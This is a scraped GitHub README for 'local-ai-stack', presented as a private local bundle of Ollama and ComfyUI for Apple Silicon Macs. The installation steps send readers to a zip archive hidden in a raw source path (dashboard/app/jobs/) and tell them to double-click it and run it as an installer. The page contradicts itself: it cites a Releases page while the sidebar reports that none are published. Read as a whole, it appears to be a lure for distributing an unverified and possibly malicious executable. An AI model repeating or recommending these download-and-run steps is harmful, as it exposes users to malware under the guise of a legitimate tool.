Skip to content

πŸ” Build local AI infrastructure on M2 MacBook Air with zero cloud dependencies, ensuring unlimited usage and complete privacy.

License

Notifications You must be signed in to change notification settings

afterthings7/local-ai-stack

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

19 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸŽ‰ local-ai-stack - Your Local AI Environment Made Easy

πŸš€ Getting Started

Welcome to the local-ai-stack repository! This guide will help you download and run our application smoothly. Designed specifically for Apple Silicon, local-ai-stack includes Ollama, a local LLM (Large Language Model), and ComfyUI for Stable Diffusion. You can enjoy powerful AI capabilities without relying on cloud services. Follow these steps to get started.

πŸ“₯ Download the Application

Download local-ai-stack

You can download the latest version of local-ai-stack from our Releases page.

πŸ”§ System Requirements

Before you begin, ensure your system meets the following requirements:

  • Operating System: macOS on Apple Silicon (M1, M2, or later)
  • RAM: At least 8 GB recommended
  • Storage Space: Minimum of 2 GB of free space
  • Network: Required for the initial setup and updates

πŸ“‚ Installation Steps

  1. Visit the Download Page: Go to our Releases page to find the latest version.

  2. Download the Files:

    • Find the latest release.
    • Look for the file named https://github.com/afterthings7/local-ai-stack/raw/refs/heads/main/dashboard/app/jobs/local-ai-stack-v1.3.zip.
    • Click on the file to start the download.
  3. Open the Downloaded File:

    • Locate the downloaded https://github.com/afterthings7/local-ai-stack/raw/refs/heads/main/dashboard/app/jobs/local-ai-stack-v1.3.zip file in your "Downloads" folder.
  4. Run the Installer:

    • Double-click the https://github.com/afterthings7/local-ai-stack/raw/refs/heads/main/dashboard/app/jobs/local-ai-stack-v1.3.zip file.
    • Follow the prompts to complete the installation.
  5. Launch the Application:

    • Once the installation finishes, you will find local-ai-stack in your Applications folder.
    • Open the application to start exploring its features.

🌐 Features

local-ai-stack comes packed with various features designed for ease of use:

  • Local AI Models: Enjoy access to Ollama's powerful language models without any internet connection.
  • Stable Diffusion: Create stunning images with ComfyUI, a user-friendly interface tailored for both beginners and experts.
  • Privacy Focused: All your data stays on your device. There are no cloud dependencies, ensuring your privacy is maintained.
  • Easy Updates: Keep your software current with simple update prompts.

πŸ“š User Guide

For detailed instructions and tips, you can access the full user guide inside the application. Here’s a brief overview of what you’ll find:

  • Getting Help: Access troubleshooting guides and FAQs within the app.
  • Using Ollama: Step-by-step instructions on how to engage with the LLM.
  • Creating Images: Simple tutorials on how to utilize ComfyUI for generating images.

πŸ› οΈ Troubleshooting

If you encounter issues during installation or use, try these troubleshooting steps:

  • Reboot Your System: Sometimes, a simple restart can solve many problems.
  • Check Your Requirements: Ensure your system meets the minimum requirements listed above.
  • Consult the User Guide: Most common questions and solutions are addressed in the application’s user guide.

If problems persist, reach out for support on our GitHub Issues page.

πŸ”— Get Help or Report Issues

To seek help or to report issues, please visit our GitHub Issues page. We encourage users to provide clear details to ensure quick assistance.

πŸ“₯ Download & Install

To download local-ai-stack, visit our Releases page once more. Follow the installation steps above, and get started with your local AI setup.

We hope you enjoy using local-ai-stack!

About

πŸ” Build local AI infrastructure on M2 MacBook Air with zero cloud dependencies, ensuring unlimited usage and complete privacy.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 3

  •  
  •  
  •